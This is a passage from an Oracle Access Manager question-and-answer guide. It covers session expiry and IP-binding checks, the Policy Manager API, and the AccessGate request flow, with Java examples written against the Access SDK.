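            return Verdict.EXPIRED_MAX_SESSION;
        }
        // Idle Session Time: no protected-resource access for this long
        if (IDLE_SESSION_TIME > 0 && sinceLast >= IDLE_SESSION_TIME) {
            return Verdict.EXPIRED_IDLE;
        }
        // IPValidation: client address must match the cookie's address, unless the
        // request arrives from an address on the IPValidationException list
        if (IP_VALIDATION && !IP_VALIDATION_EXCEPTION.contains(clientIp)
                && !clientIp.equals(cookieIp)) {
            return Verdict.IP_MISMATCH;
        }
        return Verdict.VALID;
    }

    public static void main(String[] args) {
        Instant now = Instant.now();
        Instant authAt = now.minusSeconds(600);
        // same address as the cookie, recently active
        System.out.println(check(authAt, now.minusSeconds(60), "192.0.2.10", "192.0.2.10", now));
        // different address, not on the exception list
        System.out.println(check(authAt, now.minusSeconds(60), "192.0.2.10", "192.0.2.99", now));
        // request via a listed proxy: the IP check is skipped
        System.out.println(check(authAt, now.minusSeconds(60), "192.0.2.10", "10.0.0.5", now));
        // authenticated longer ago than Maximum User Session Time
        System.out.println(check(now.minusSeconds(4000), now, "192.0.2.10", "192.0.2.10", now));
    }
}
```

Note that every address on the exception list effectively disables the cookie-to-client binding for traffic arriving from it, so the list should contain only trusted proxies.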

Q: What is Policy Manager API?
A: The Policy Manager API provides an interface that enables custom applications to access the authentication, authorization, and auditing services of the Access Server, and to create and modify Access System policy domains and their contents.

Q: When do you need an AccessGate?
A: An AccessGate is required instead of a standard WebGate when you need to control access to a resource for which OAM does not provide an out-of-the-box solution. These might include:

  1. Protection of non-HTTP resources (EJB, JNDI, etc.)
  2. Implementation of SSO to protect a combination of HTTP and non-HTTP resources.

A file called obAccessClient.xml is stored on the server where the AccessGate is installed. This file contains the configuration parameters entered through the configureAccessGate tool.

Q: Explain the flow when a user makes a request for a resource protected by an AccessGate (not a WebGate)?
A: The flow is shown below.

  • The application or servlet containing the AccessGate code receives a resource request from the user.
  • The AccessGate code constructs an ObResourceRequest structure and contacts the Access Server to find out whether the resource is protected.
  • The Access Server responds.
  • If the resource is not protected, the AccessGate allows the user to access the resource. Otherwise:
  • The AccessGate constructs an ObAuthenticationScheme structure to ask the Access Server what credentials the user needs to supply.
  • The Access Server responds.
  • The application uses a form or some other means to collect the credentials.
  • The AccessGate constructs an ObUserSession structure, which presents the user's details to the Access Server.
  • If the credentials prove valid, the AccessGate creates a session token for the user and then sends an authorization request to the Access Server.
  • The Access Server checks whether the user is authorized to access that resource.
  • The AccessGate allows the user to access the requested resource.
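The same flow as a custom AccessGate, written as an added example against the OAM 10g Java Access SDK (package com.oblix.access, as I recall its classes and method names; treat the exact signatures as an assumption and check them against your SDK version). The SDK directory, resource URL, user name and addresses are placeholders.

```java
import java.util.Hashtable;
import com.oblix.access.ObAccessException;
import com.oblix.access.ObAuthenticationScheme;
import com.oblix.access.ObConfig;
import com.oblix.access.ObResourceRequest;
import com.oblix.access.ObUserSession;

/** Custom AccessGate walking the steps above for one request (constructed values). */
public class CustomAccessGate {
    static final String SDK_INSTALL_DIR = "/path/to/AccessServerSDK"; // holds obAccessClient.xml
    static final String RESOURCE = "//app.example.com/reports/summary";
    static final String OPERATION = "GET";

    public static void main(String[] args) {
        try {
            // The SDK reads obAccessClient.xml (written by configureAccessGate) from this directory
            ObConfig.initialize(SDK_INSTALL_DIR);

            // ObResourceRequest: ask the Access Server whether the resource is protected
            ObResourceRequest res = new ObResourceRequest("http", RESOURCE, OPERATION);
            if (!res.isProtected()) {
                System.out.println("Not protected; serve it directly.");
                return;
            }
            // ObAuthenticationScheme: find out which credentials the scheme requires
            ObAuthenticationScheme scheme = new ObAuthenticationScheme(res);
            if (!scheme.isForm() && !scheme.isBasic()) {
                System.out.println("Scheme needs credentials this gate does not collect.");
                return;
            }
            // Credentials collected by the application (constructed here, never hard-code in practice)
            Hashtable<String, String> creds = new Hashtable<>();
            creds.put("userid", "jdoe");
            creds.put("password", "placeholder-password");
            creds.put("ip", "192.0.2.10");  // client address, so the server can bind the session to it

            // ObUserSession: present the user to the Access Server and check the outcome
            ObUserSession session = new ObUserSession(res, creds);
            if (session.getStatus() != ObUserSession.LOGGEDIN) {
                System.out.println("Authentication failed: " + session.getErrorMessage());
                return;
            }
            String token = session.getSessionToken(); // what a WebGate would carry in the ObSSOCookie

            // Authorization is a separate decision for this resource and operation
            boolean allowed = session.isAuthorized(res);
            System.out.println(allowed ? "Authorized (token issued, " + token.length() + " chars)"
                                       : "Authenticated but not authorized for " + OPERATION + " " + RESOURCE);
        } catch (ObAccessException e) {
            System.out.println("Access SDK error: " + e.getMessage());
        } finally {
            ObConfig.shutdown();
        }
    }
}
```

Note that a successful ObUserSession only proves authentication; the isAuthorized call must be made per resource, and an application that serves the resource after LOGGEDIN alone skips the policy evaluation.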
